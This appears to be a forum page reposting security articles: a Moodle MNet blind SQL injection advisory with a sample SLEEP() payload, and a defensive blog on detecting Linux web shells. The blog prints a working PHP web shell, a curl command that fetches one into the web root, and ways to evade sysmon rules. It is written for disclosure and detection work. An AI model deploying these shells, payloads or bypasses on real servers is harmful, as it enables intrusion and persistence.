Everything posted by Nytro

  1. Moodle Blind SQL injection via MNet authentication
     23-11-2021 - rekter0

Moodle is an open-source learning management system, popular in universities and workplaces, largely used to manage courses, activities and learning content, with about 200 million users.

Versions affected: 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, 3.5 to 3.5.17
CVE identifier: CVE-2021-32474

# Summary

What is MNet? The Moodle network feature allows a Moodle administrator to establish a link with another Moodle or a Mahara site and to share some resources with the users of that Moodle. Official documentation: https://docs.moodle.org/310/en/MNet

How? MNet communicates with peers through XML-RPC, using messages encrypted and signed with RSA 2048.

So what? The keepalive_server XML-RPC method in auth/mnet/auth.php passes unsanitized user-supplied parameters to a SQL query => SQL injection.

Attack scenarios:
1. You compromised one Moodle instance, and use it to launch attacks on its peers
2. An evil Moodle instance decides to attack its peers
3. For one reason or another, some MNet instance keypairs are leaked

# Vulnerability analysis

Moodle uses signed and encrypted XML-RPC messages to communicate via the MNet protocol.

/mnet/xmlrpc/client.php

```php
function send($mnet_peer) {
    global $CFG, $DB;

    if (!$this->permission_to_call($mnet_peer)) {
        mnet_debug("tried and wasn't allowed to call a method on $mnet_peer->wwwroot");
        return false;
    }

>   $this->requesttext = xmlrpc_encode_request($this->method, $this->params, array("encoding" => "utf-8", "escaping" => "markup"));
>   $this->signedrequest = mnet_sign_message($this->requesttext);
>   $this->encryptedrequest = mnet_encrypt_message($this->signedrequest, $mnet_peer->public_key);

    $httprequest = $this->prepare_http_request($mnet_peer);
>   curl_setopt($httprequest, CURLOPT_POSTFIELDS, $this->encryptedrequest);
```

The XML-RPC message is first signed using the private key:

/mnet/lib.php

```php
function mnet_sign_message($message, $privatekey = null) {
    global $CFG;
    $digest = sha1($message);
    $mnet = get_mnet_environment();

    // If the user hasn't supplied a private key (for example, one of our older,
    // expired private keys, we get the current default private key and use that.
    if ($privatekey == null) {
        $privatekey = $mnet->get_private_key();
    }

    // The '$sig' value below is returned by reference.
    // We initialize it first to stop my IDE from complaining.
    $sig = '';
    $bool = openssl_sign($message, $sig, $privatekey); // TODO: On failure?

    $message = '<?xml version="1.0" encoding="iso-8859-1"?>
    <signedMessage>
      <Signature Id="MoodleSignature" xmlns="http://www.w3.org/2000/09/xmldsig#">
        <SignedInfo>
          <CanonicalizationMethod Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/>
          <SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
          <Reference URI="#XMLRPC-MSG">
            <DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/>
            <DigestValue>'.$digest.'</DigestValue>
          </Reference>
        </SignedInfo>
        <SignatureValue>'.base64_encode($sig).'</SignatureValue>
        <KeyInfo>
          <RetrievalMethod URI="'.$CFG->wwwroot.'/mnet/publickey.php"/>
        </KeyInfo>
      </Signature>
      <object ID="XMLRPC-MSG">'.base64_encode($message).'</object>
      <wwwroot>'.$mnet->wwwroot.'</wwwroot>
      <timestamp>'.time().'</timestamp>
    </signedMessage>';
    return $message;
}
```

The XML envelope, along with its signature, is then encrypted:

/mnet/lib.php

```php
function mnet_encrypt_message($message, $remote_certificate) {
    $mnet = get_mnet_environment();

    // Generate a key resource from the remote_certificate text string
    $publickey = openssl_get_publickey($remote_certificate);

    if ( gettype($publickey) != 'resource' ) {
        // Remote certificate is faulty.
        return false;
    }

    // Initialize vars
    $encryptedstring = '';
    $symmetric_keys = array();

    // passed by ref -> &$encryptedstring &$symmetric_keys
    $bool = openssl_seal($message, $encryptedstring, $symmetric_keys, array($publickey));
    $message = $encryptedstring;
    $symmetrickey = array_pop($symmetric_keys);

    $message = '<?xml version="1.0" encoding="iso-8859-1"?>
    <encryptedMessage>
      <EncryptedData Id="ED" xmlns="http://www.w3.org/2001/04/xmlenc#">
        <EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#arcfour"/>
        <ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
          <ds:RetrievalMethod URI="#EK" Type="http://www.w3.org/2001/04/xmlenc#EncryptedKey"/>
          <ds:KeyName>XMLENC</ds:KeyName>
        </ds:KeyInfo>
        <CipherData>
          <CipherValue>'.base64_encode($message).'</CipherValue>
        </CipherData>
      </EncryptedData>
      <EncryptedKey Id="EK" xmlns="http://www.w3.org/2001/04/xmlenc#">
        <EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#rsa-1_5"/>
        <ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
          <ds:KeyName>SSLKEY</ds:KeyName>
        </ds:KeyInfo>
        <CipherData>
          <CipherValue>'.base64_encode($symmetrickey).'</CipherValue>
        </CipherData>
        <ReferenceList>
          <DataReference URI="#ED"/>
        </ReferenceList>
        <CarriedKeyName>XMLENC</CarriedKeyName>
      </EncryptedKey>
      <wwwroot>'.$mnet->wwwroot.'</wwwroot>
    </encryptedMessage>';
    return $message;
}
```

On the other side, the server receives the XML-RPC request and processes it by verifying the signature and then decrypting the envelope:

/mnet/xmlrpc/server.php

```php
try {
    $plaintextmessage = mnet_server_strip_encryption($rawpostdata);
    $xmlrpcrequest = mnet_server_strip_signature($plaintextmessage);
} catch (Exception $e) {
    mnet_debug('encryption strip exception thrown: ' . $e->getMessage());
    exit(mnet_server_fault($e->getCode(), $e->getMessage(), $e->a));
}
[...]
// Have a peek at what the request would be if we were to process it
> $params = xmlrpc_decode_request($xmlrpcrequest, $method);
mnet_debug("incoming mnet request $method");
[...]
if ((($remoteclient->request_was_encrypted == true) && ($remoteclient->signatureok == true))
    || (($method == 'system.keyswap') || ($method == 'system/keyswap'))
    || (($remoteclient->signatureok == true) && ($remoteclient->plaintext_is_ok() == true))) {
    try {
        // main dispatch call. will echo the response directly
>       mnet_server_dispatch($xmlrpcrequest);
        mnet_debug('exiting cleanly');
        exit;
    } catch (Exception $e) {
        mnet_debug('dispatch exception thrown: ' . $e->getMessage());
        exit(mnet_server_fault($e->getCode(), $e->getMessage(), $e->a));
    }
}
```

Moodle then dispatches the XML-RPC method to the appropriate function.

Blind SQL Injection

The keepalive_server method passes client-supplied parameters to a SQL query unsanitized:

/auth/mnet/auth.php

```php
function keepalive_server($array) {
    global $CFG, $DB;
    $remoteclient = get_mnet_remote_client();

    // We don't want to output anything to the client machine
    $start = ob_start();

    // We'll get session records in batches of 30
    $superArray = array_chunk($array, 30);
    $returnString = '';

    foreach($superArray as $subArray) {
        $subArray = array_values($subArray);
>       $instring = "('".implode("', '",$subArray)."')";
>       $query = "select id, session_id, username from {mnet_session} where username in $instring";
>       $results = $DB->get_records_sql($query);
        if ($results == false) {
            // We seem to have a username that breaks our query:
            // TODO: Handle this error appropriately
            $returnString .= "We failed to refresh the session for the following usernames: \n".implode("\n", $subArray)."\n\n";
        } else {
            foreach($results as $emigrant) {
                \core\session\manager::touch_session($emigrant->session_id);
            }
        }
    }

    $end = ob_end_clean();

    if (empty($returnString)) return array('code' => 0, 'message' => 'All ok', 'last log id' => $remoteclient->last_log_id);
    return array('code' => 1, 'message' => $returnString, 'last log id' => $remoteclient->last_log_id);
}
```

The array parameters of keepalive_server are processed via implode() and concatenated directly into the SQL query, leading to blind SQL injection.
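To make the flaw concrete, here is a rough illustration of the string keepalive_server ends up executing when one element of the attacker-controlled array carries a quote. This is only a sketch of the resulting query (assuming the default mdl_ table prefix and MySQL syntax), not a working MNet client — a real request must still be signed and encrypted as shown above:

```bash
# Hypothetical "username" smuggled inside the keepalive XML-RPC array.
# implode("', '", $subArray) drops it between single quotes unescaped:
USERNAME="x') AND (SELECT 1 FROM (SELECT SLEEP(5))t)-- -"
echo "select id, session_id, username from mdl_mnet_session where username in ('x', '${USERNAME}')"
```

Since the query results are never returned to the caller, an attacker would have to extract data blindly, e.g. via time-based conditions like the SLEEP() above.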
# Impact

Blind SQL injection in the keepalive_server XML-RPC method of MNet authentication. Successful exploitation could have led to compromise of the targeted Moodle instance, with the possibility of RCE.

# Timeline

24-01-2021 - Reported
05-02-2021 - Vendor confirmed
17-05-2021 - Fixed in new release

Sursa: https://r0.haxors.org/posts?id=26
  2. Personal information inference from voice recordings: User awareness and privacy concerns
     Jacob Leon Kröger, Leon Gellrich, Sebastian Pape, Saba Rebecca Brause and Stefan Ullrich
     Published Online: 20 Nov 2021 | Page range: 6-27 | Received: 31 May 2021 | Accepted: 16 Sep 2021
     DOI: https://doi.org/10.2478/popets-2022-0002
     © 2022 Jacob Leon Kröger et al., published by Sciendo. This work is licensed under the Creative Commons Attribution-NonCommercial-NoDerivatives 3.0 License.

Sursa: https://sciendo.com/article/10.2478/popets-2022-0002
  3. Hunting for Persistence in Linux (Part 1): Auditd, Sysmon, Osquery, and Webshells
     Nov 22, 2021 • Pepe Berba

This blog series explores methods attackers might use to maintain persistent access to a compromised Linux system. To do this, we will take an "offense informs defense" approach by going through techniques listed in the MITRE ATT&CK Matrix for Linux. I will try to:
- Give examples of how an attacker might deploy one of these backdoors
- Show how a defender might monitor and detect these installations

By giving concrete implementations of these persistence techniques, I hope to give defenders a better appreciation of what exactly they are trying to detect, and some clear examples of how they can test their own alerting.

Overview of blog series

The rest of the blog post is structured as follows:
- Introduction to persistence
- Linux auditing and file integrity monitoring
- How to set up and detect web shells

Each persistence technique has two main parts:
- How to deploy the persistence technique
- How to monitor and detect the persistence technique

In this blog post we will only discuss web shells, as a case study for logging and monitoring. We will discuss other techniques in succeeding posts. Throughout this series we will go through the following:
- Hunting for Persistence in Linux (Part 1): Auditing, Logging and Webshells
  - Server Software Component: Web Shell
- Hunting for Persistence in Linux (Part 2): Account Creation and Manipulation
  - Create Account: Local Account
  - Valid Accounts: Local Accounts
  - Account Manipulation: SSH Authorized Keys
- Hunting for Persistence in Linux (Part 3): Systemd, Timers, and Cron
  - Create or Modify System Process: Systemd Service
  - Scheduled Task/Job: Systemd Timers
  - Scheduled Task/Job: Cron
- Hunting for Persistence in Linux (Part 4): Initialization Scripts, Shell Configuration, and others
  - Boot or Logon Initialization Scripts: RC Scripts
  - Event Triggered Execution: Unix Shell Configuration Modification

Introduction to persistence

Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. [1]

Attackers employ persistence techniques so that exploitation phases do not need to be repeated. Remember, exploitation is just the first step for the attacker; they still need to take additional steps to fulfill their primary objective. After successfully gaining access to the machine, they need to pivot through the network and find a way to access and exfiltrate the crown jewels. During these post-exploitation activities, the attacker's connection to the machine can be severed, and to regain access, the attacker might need to repeat the exploitation step. Redoing the exploitation might be difficult depending on the attack vector:
- Sending an email with a malicious attachment: The victim wouldn't open the same maldoc twice. You'd have to send another email and hope the victim falls for it again.
- Using leaked credentials and keys: The passwords might be reset or the keys revoked.
- Exploiting servers with critical CVEs: The server can be patched.

Because of how difficult exploitation can be, an attacker wants to make the most out of their initial access. To do this, they install backdoor access that reliably maintains access to the compromised machine even after reboots. With persistence installed, the attacker no longer needs to rely on exploitation to regain access to the system.
They might simply use the added account on the machine, or wait for the reverse shell from an installed service.

0 Linux Logging and Auditing

0.1 File Integrity Monitoring

The configuration changes needed to set up persistence usually require the attacker to touch the machine's disk, such as creating or modifying a file. This gives us an opportunity to catch the adversaries if we are able to look out for file creation or modification related to special files or directories.

For example, we can look for the creation of the web shell itself. This can be done by looking for changes within the web directory, like /var/www/html. You can use the following:
- Wazuh's File Integrity Monitoring: https://documentation.wazuh.com/current/learning-wazuh/detect-fs-changes.html
- Auditbeat's File Integrity Monitoring: https://www.elastic.co/guide/en/beats/auditbeat/current/auditbeat-module-file_integrity.html
- auditd

For these blog posts, we will mainly be using auditd and auditbeats together. For instructions on how to set up auditd and auditbeats, see A02 in the appendix.

0.2 Auditd and Sysmon

0.2.1 What is sysmon and auditd?

Two powerful tools to monitor the different processes in the OS are:
- auditd: the de facto auditing and logging tool for Linux
- sysmon: previously a tool exclusively for Windows; a Linux port has recently been released

Each of these tools requires you to configure rules for it to generate meaningful logs and alerts. We will use the following for auditd and sysmon respectively:
- https://github.com/Neo23x0/auditd
- https://github.com/microsoft/MSTIC-Sysmon/tree/main/linux

For instructions on how to install sysmon, refer to appendix A01.

0.2.2 Comparison of sysmon and auditd

At the time of writing this blog post, sysmon for Linux has only been out for about a month, and I have no experience deploying it at scale. Support for sysmon for Linux is still in development for agents such as the Linux Elastic Agent (see the issue here). I'm using sysmonforlinux/buster,now 1.0.0 amd64 [installed].

While doing the research for this blog post, my observations so far are:
- Sysmon's rule definitions are much more flexible and expressive than auditd's, but rules depending on user-input fields such as CommandLine can be bypassed through string matching, just like other rules.
- In my testing, sysmon only has the FileCreate event, which is triggered only when creating or overwriting files. File modification (such as appending to files) is not caught by sysmon, which makes file integrity monitoring one of its weaknesses.
- I've experienced some problems with the rule title displayed in the logs.
- Auditd rules can filter down to the syscall level, while sysmon filters on high-level predefined events such as ProcessCreation and FileCreate. This means that if a particular activity you are looking for is not mapped to a sysmon event, you might have a hard time using sysmon to watch for it.

Overall, I'm very optimistic about adopting sysmon for Linux in the future to look for interesting processes and connections, but I would still rely on other tools such as auditd or auditbeats for file integrity monitoring. In Windows, having only FileCreate is okay since you have other events specific to configuration changes in registry keys (RegistryEvent), but in Linux, since all configuration is essentially files, file integrity monitoring plays a much bigger role in hunting for changes in system configuration.
The good thing about sysmon is that its rules for network activity and process creation are much more expressive than trying to use a0, a1 for command-line arguments in auditd. We will discuss some of the findings in the next blog posts, but some examples of bypasses are:
- T1087.001_LocalAccount_Commands.xml looks for commands that contain /etc/passwd to detect account enumeration. We can use cat /etc//passwd to bypass this rule.
- T1070.006_Timestomp_Touch.xml looks for -r or --reference in touch commands to detect timestamp modification. We can use touch a -\r b to bypass this, or even touch a -\-re\ference=b.
- T1053.003_Cron_Activity.xml aims to monitor changes to crontab files. Using echo "* * * * * root touch /root/test" >> /etc/crontab will bypass this because it does not create or overwrite a file, and in Debian 10, using the standard crontab -e will not trigger it because the TargetFilename is +/var/spool/cron/crontabs and the extra + at the start causes the rule to fail.

You can see the different architectures for auditd and sysmon here:
- Redhat: CHAPTER 7. SYSTEM AUDITING
- Lead Microsoft Engineer Kevin Sheldrake Brings Sysmon to Linux

We see from the diagram from linuxsecurity.com that sysmon works on top of eBPF, which is an interface for syscalls of the Linux kernel. This serves as an abstraction when we define sysmon rules, but as a consequence, this flexibility gives attackers room to bypass some of the rules. For example, in sysmon we can look for a FileCreate event with a specific TargetFilename. This is more flexible because you can define rules based on patterns or keywords and look for files that do not exist yet. However, string matches such as /etc/passwd can fail if the target name is not exactly that string.

Auditd is different: what is watched are actions on the inodes of the files and directories defined. This means there is no ambiguity about which specific files are being watched; you can even look for read access to specific files. However, because it watches based on inodes, the files have to exist when the auditd service is started. This means you cannot watch files based on patterns like <home>/.ssh/authorized_keys.

0.3 osquery

Osquery allows us to investigate our endpoints using SQL queries. This simplifies the task of investigating and collecting evidence. Moreover, when paired with a management interface like fleetdm, it allows you to take baselines of your environments and even hunt for adversaries.

An example from a future blog post is looking for accounts that have a password set. If you expect your engineers to always SSH via public key, then you should not see active passwords. We can get this information using this query:

```sql
SELECT password_status, username, last_change
FROM shadow
WHERE password_status = 'active';
```

And get results for your whole fleet, similar to this:

```
+-----------------+----------+-------------+
| password_status | username | last_change |
+-----------------+----------+-------------+
| active          | www-data | 18953       |
+-----------------+----------+-------------+
```

Now why does www-data have a password? Hmm…

Installation instructions can be found in the official docs. Once installed, simply run osqueryi and enter your SQL queries.
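As a quick usage sketch (assuming osquery is installed), the same check can also be run non-interactively, which is handy for ad-hoc sweeps or scheduled jobs:

```bash
# Run the shadow-table query in one shot and emit JSON for further processing.
osqueryi --json \
  "SELECT password_status, username, last_change FROM shadow WHERE password_status = 'active';"
```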
1 Server Software Component: Web Shell

1.1 Introduction to web shells

MITRE: https://attack.mitre.org/techniques/T1505/003/

A web shell is a backdoor installed in a web server by an attacker. Once installed, it becomes the attacker's initial foothold, and if it's never detected, it becomes an easy persistent backdoor.

In our example, to install a web shell we add a bad .php file inside /var/www/html. Some reasons this can happen are:
- the web application has a vulnerable upload API
- the web application has a critical RCE vulnerability
- the attacker has existing access that can modify the contents of the web root folder

If the attacker can upload malicious files that run as php, then they can get remote access to the machine. One famous example of this is the 2017 Equifax Data Breach. You can read the report, but here's my TLDR: The web server was running Apache Struts containing a critical RCE vulnerability. Attackers used this RCE to drop web shells, which they used to gain access to sensitive data and exfiltrate it. Around 30 different web shells were used in the breach.

See the following resources:
- https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
- https://portswigger.net/web-security/os-command-injection

1.2 Installing your own web shells

Note: If you want to try this out, you can follow the setup instructions in appendix A00.

Assuming we already have RCE, we add a file phpinfo.php that will contain our web shell:

```
vi /var/www/html/phpinfo.php
```

Choose any of the example php web shells, for example:

```php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
  <input type="TEXT" name="cmd" id="cmd" size="80">
  <input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
```

Now anyone with access to http://x.x.x.x/phpinfo.php would be able to access the web shell and run arbitrary commands.

What if you don't have shell access? You might be able to install a web shell through an unrestricted upload. Upload your php backdoor as image.png.php, and the backdoor might be accessible on http://x.x.x.x/uploads/image.png.php.

Another possible command that you can use is:

```
curl https://raw.githubusercontent.com/JohnTroony/php-webshells/master/Collection/PHP_Shell.php -o /var/www/html/backdoor_shell.php
```
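Once dropped, using the shell is just an HTTP request. A quick sketch (host and file name match the example above):

```bash
# Run a command through the GET-parameter web shell installed above.
curl 'http://x.x.x.x/phpinfo.php?cmd=id'
```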
1.3 Detection: Creation or modification of php files

Using auditbeat's file integrity monitoring

For some web applications, we might be able to monitor the directories of our web app with auditbeat's file integrity monitoring module:

```
- module: file_integrity
  paths:
  - /bin
  - /usr/bin
  - /sbin
  - /usr/sbin
  - /etc
  - /var/www/html    # <--- Add
- module: system
  datasets:
    - package # Installed, updated, and removed packages
```

Looking at events with event.module: file_integrity, we see that our vi command "moved" the file. In this case, moved is the same as updated because of how vi works: it creates a temporary file /var/www/html/phpinfo.php.swp, and when you save, it replaces /var/www/html/phpinfo.php. An example of a command that results in a created event would be:

```
curl https://raw.githubusercontent.com/JohnTroony/php-webshells/master/Collection/PHP_Shell.php -o /var/www/html/backdoor_shell.php
```

Using auditd to monitor changes

We can add the following rule to auditd:

```
-w /var/www/html -p wa -k www_changes
```

You can then search for all writes or attribute changes to files in /var/www/html using the filter tags: www_changes or key="www_changes". The raw auditd logs look like this:

```
type=SYSCALL msg=audit(1637597150.454:10650): arch=c000003e syscall=257 success=yes exit=4 a0=ffffff9c a1=556e6969fbc0 a2=241 a3=1b6 items=2 ppid=12962 pid=13086 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=11 comm="curl" exe="/usr/bin/curl" subj==unconfined key="www_changes"
type=PATH msg=audit(1637597150.454:10650): item=0 name="/var/www/html" inode=526638 dev=08:01 mode=040755 ouid=0 ogid=0 rdev=00:00 nametype=PARENT cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
type=PATH msg=audit(1637597150.454:10650): item=1 name="backdoor_shell.php" inode=527243 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=CREATE cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
type=PROCTITLE msg=audit(1637597150.454:10650): proctitle=6375726C0068747470733A2F2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A6F686E54726F6F6E792F7068702D7765627368656C6C732F6D61737465722F436F6C6C656374696F6E2F5048505F5368656C6C2E706870002D6F006261636B646F6F725F7368656C6C2E706870
```

This allows us to note:
- euid=0: the effective UID of the action
- exe="/usr/bin/curl": the command that was run
- name="/var/www/html" ... name="backdoor_shell.php": the output file
- key="www_changes": the key of the auditd rule that fired
- proctitle=63757...: the hex-encoded title of the process, which is our original curl command

Notes on file integrity monitoring for detecting web shells

There are other ways to check. For example, if there is version control (like git), you can compare the current state with a known good state and investigate the differences. However, if there are folders where we expect specific files to be written and modified often, such as upload directories, then file integrity monitoring might not be fully effective. We might have to fine-tune this alert and exclude those upload directories to reduce noise — but then how would you detect web shells uploaded inside the upload directory itself? We need to look for more effective means of detecting web shells.

1.4 Detection: Looking for command execution by www-data using auditd

When we run web servers such as nginx, the service runs under the user www-data. During regular operations, we should not expect to see that user running commands such as whoami or ls. However, if there is a web shell, these are some of the commands we are most likely to see, so we should use auditd to detect them. Here is an auditd rule that looks for execve syscalls by www-data (euid=33), tagged as detect_execve_www:

```
-a always,exit -F arch=b64 -F euid=33 -S execve -k detect_execve_www
-a always,exit -F arch=b32 -F euid=33 -S execve -k detect_execve_www
```

We run the following commands on our web shell:

```
whoami
id
pwd
ls -alh
```

We get the following logs from auditd, as parsed by auditbeats.
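If you want to pull matching events straight off the box rather than through auditbeats, the standard audit userspace tools can query by rule key — a usage sketch, assuming ausearch is installed:

```bash
# List audit records tagged by our keys; -i resolves uids and syscall numbers.
ausearch -k detect_execve_www -i
ausearch -k www_changes -i
```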
Here is an example of a raw auditd log for whoami:

```
type=SYSCALL msg=audit(1637597946.536:10913): arch=c000003e syscall=59 success=yes exit=0 a0=7fb62eb89519 a1=7ffd0906fa70 a2=555f6f1d7f50 a3=1 items=2 ppid=7182 pid=13281 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="sh" exe="/usr/bin/dash" subj==unconfined key="detect_execve_www"
type=EXECVE msg=audit(1637597946.536:10913): argc=3 a0="sh" a1="-c" a2="whoami"
type=PATH msg=audit(1637597946.536:10913): item=0 name="/bin/sh" inode=709 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
type=PATH msg=audit(1637597946.536:10913): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=1449 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
type=PROCTITLE msg=audit(1637597946.536:10913): proctitle=7368002D630077686F616D69
```

This allows us to note:
- euid=33, uid=33: which is www-data
- comm="sh" exe="/usr/bin/dash": the shell
- argc=3 a0="sh" a1="-c" a2="whoami": the command run in the shell
- key="detect_execve_www": the key of the auditd rule that fired

Note regarding detect_execve_www

Let's say you decide to use the default rules found in https://github.com/Neo23x0/auditd/blob/master/audit.rules. If you then reach for ready-made detection rules, such as those that come with sigma, you might try lnx_auditd_web_rce.yml. If you use this query with the rules from Neo23x0, you will fail to detect any web shells, because the detection rule is:

```
detection:
    selection:
        type: 'SYSCALL'
        syscall: 'execve'
        key: 'detect_execve_www'
    condition: selection
```

Notice that this filters for the key detect_execve_www, but this exact key is not defined anywhere in Neo23x0's audit.rules! This is why you should always test your configurations and see whether they detect the known bad. In Neo23x0's rules, the closest things you get are commented out by default:

```
## Suspicious shells
#-w /bin/ash -p x -k susp_shell
#-w /bin/bash -p x -k susp_shell
#-w /bin/csh -p x -k susp_shell
#-w /bin/dash -p x -k susp_shell
#-w /bin/busybox -p x -k susp_shell
#-w /bin/ksh -p x -k susp_shell
#-w /bin/fish -p x -k susp_shell
#-w /bin/tcsh -p x -k susp_shell
#-w /bin/tclsh -p x -k susp_shell
#-w /bin/zsh -p x -k susp_shell
```

In this case, our web shell used /bin/dash because it is the default shell /bin/sh points to in the VM I tested this on, so the relevant rule would be:

```
-w /bin/dash -p x -k susp_shell
```

But this relies on the web shell using /bin/dash; if the web shell is able to use other shells, this specific alert will fail. Test your auditd rules against specific scenarios to ensure they work as expected. For more information on how to write rules for auditd, see:
- https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-defining_audit_rules_and_controls
- https://www.redhat.com/sysadmin/configure-linux-auditing-auditd

1.5 Detection: Looking for command execution by www-data using sysmon

MSTIC-Sysmon has two rules for this, found respectively in T1505.003 and T1059.004, which look for:
- process creation using /bin/bash, /bin/dash, or /bin/sh
- process creation where the parent process is dash, nginx, or similar, and the current command is one of whoami, ifconfig, /usr/bin/ip, etc.
If we run whoami in the setup we have, the first rule triggered will be T1059.004, TechniqueName=Command and Scripting Interpreter: Unix Shell, because of the order of the rules:

```xml
<Event>
  <System>
    <Provider Name="Linux-Sysmon" Guid="{ff032593-a8d3-4f13-b0d6-01fc615a0f97}"/>
    <EventID>1</EventID>
    <Version>5</Version>
    <Channel>Linux-Sysmon/Operational</Channel>
    <Computer>sysmon-test</Computer>
    <Security UserId="0"/>
  </System>
  <EventData>
    <Data Name="RuleName">TechniqueID=T1059.004,TechniqueName=Command and Scriptin</Data>
    <Data Name="UtcTime">2021-11-23 14:06:07.116</Data>
    <Data Name="ProcessGuid">{717481a5-f54f-619c-2d4e-bd5574550000}</Data>
    <Data Name="ProcessId">11662</Data>
    <Data Name="Image">/usr/bin/dash</Data>
    <Data Name="FileVersion">-</Data>
    <Data Name="Description">-</Data>
    <Data Name="Product">-</Data>
    <Data Name="Company">-</Data>
    <Data Name="OriginalFileName">-</Data>
    <Data Name="CommandLine">sh -c whoami</Data>
    <Data Name="CurrentDirectory">/var/www/html</Data>
    <Data Name="User">www-data</Data>
    <Data Name="LogonGuid">{717481a5-0000-0000-2100-000000000000}</Data>
    <Data Name="LogonId">33</Data>
    <Data Name="TerminalSessionId">4294967295</Data>
    <Data Name="IntegrityLevel">no level</Data>
    <Data Name="Hashes">-</Data>
    <Data Name="ParentProcessGuid">{00000000-0000-0000-0000-000000000000}</Data>
    <Data Name="ParentProcessId">10242</Data>
    <Data Name="ParentImage">-</Data>
    <Data Name="ParentCommandLine">-</Data>
    <Data Name="ParentUser">-</Data>
  </EventData>
</Event>
```

Here we see /bin/dash being executed, which is why the rule was triggered. Afterwards, the rule T1505.003, TechniqueName=Server Software Component: Web Shell is triggered because of whoami. Here is the log for it (I've removed some fields for brevity):

```xml
<Event>
  <System>
    <Provider Name="Linux-Sysmon" Guid="{ff032593-a8d3-4f13-b0d6-01fc615a0f97}"/>
    <EventID>1</EventID>
  </System>
  <EventData>
    <Data Name="RuleName">TechniqueID=T1505.003,TechniqueName=Serv</Data>
    <Data Name="UtcTime">2021-11-23 14:06:07.118</Data>
    <Data Name="ProcessGuid">{717481a5-f54f-619c-c944-fd0292550000}</Data>
    <Data Name="ProcessId">11663</Data>
    <Data Name="Image">/usr/bin/whoami</Data>
    <Data Name="CommandLine">whoami</Data>
    <Data Name="CurrentDirectory">/var/www/html</Data>
    <Data Name="User">www-data</Data>
    <Data Name="LogonGuid">{717481a5-0000-0000-2100-000000000000}</Data>
    <Data Name="LogonId">33</Data>
    <Data Name="ParentProcessId">11662</Data>
    <Data Name="ParentImage">/usr/bin/dash</Data>
    <Data Name="ParentCommandLine">sh</Data>
    <Data Name="ParentUser">www-data</Data>
  </EventData>
</Event>
```

Now with this knowledge, we can bypass the T1505.003 sysmon rule by running system("/bin/bash whoami"), so that the parent image of the whoami command is not dash. This would instead trigger two T1059.004 alerts.
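Whichever rule set you settle on, it helps to have a repeatable way of emulating web-shell activity. A small test sketch (run as root on a disposable box where the www-data user exists):

```bash
# Emulate how a PHP web shell spawns commands (sh -c ...) as www-data,
# then verify that the auditd/sysmon alerts above actually fired.
sudo -u www-data sh -c 'whoami; id; pwd; ls -alh'
```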
Just for an exercise, if we want to replicate our detect_execve_www in sysmon, we can use the following rule:

```xml
<RuleGroup name="" groupRelation="or">
  <ProcessCreate onmatch="include">
    <Rule name="detect_shell_www" groupRelation="and">
      <User condition="is">www-data</User>
      <Image condition="contains any">/bin/bash;/bin/dash;/bin/sh;whoami</Image>
    </Rule>
  </ProcessCreate>
</RuleGroup>
```

And if we want to do basic file integrity monitoring with sysmon, we can use:

```xml
<FileCreate onmatch="include">
  <Rule name="change_www" groupRelation="or">
    <TargetFilename condition="begin with">/var/www/html</TargetFilename>
  </Rule>
</FileCreate>
```

For more information about writing your own sysmon rules, you can look at:
- https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon#configuration-files
- https://techcommunity.microsoft.com/t5/sysinternals-blog/sysmon-the-rules-about-rules/ba-p/733649
- https://github.com/SwiftOnSecurity/sysmon-config/blob/master/sysmonconfig-export.xml
- https://github.com/microsoft/MSTIC-Sysmon

1.6 Hunting for web shells using osquery

With osquery, we might not be able to "find" the web shell itself, but we might be able to find evidence of it. If an attacker uses a web shell, it is possible they will try to establish a reverse shell; if so, we should see an outbound connection from the web server to the attacker:

```sql
SELECT pid, remote_address, local_port, remote_port, s.state, p.name, p.cmdline, p.uid, username
FROM process_open_sockets AS s
JOIN processes AS p USING(pid)
JOIN users USING(uid)
WHERE s.state = 'ESTABLISHED' OR s.state = 'LISTEN';
```

This looks for processes with sockets that have established connections or a listening port:

```
+-------+----------------+------------+-------------+-------------+-----------------+----------------------------------------+------+----------+
| pid   | remote_address | local_port | remote_port | state       | name            | cmdline                                | uid  | username |
+-------+----------------+------------+-------------+-------------+-----------------+----------------------------------------+------+----------+
| 14209 | 0.0.0.0        | 22         | 0           | LISTEN      | sshd            | /usr/sbin/sshd -D                      | 0    | root     |
| 468   | 0.0.0.0        | 80         | 0           | LISTEN      | nginx           | nginx: worker process                  | 33   | www-data |
| 461   | 74.125.200.95  | 51434      | 443         | ESTABLISHED | google_guest_ag | /usr/bin/google_guest_agent            | 0    | root     |
| 8563  | 10.0.0.13      | 39670      | 9200        | ESTABLISHED | auditbeat       | /usr/share/auditbeat/bin/auditbeat ... | 0    | root     |
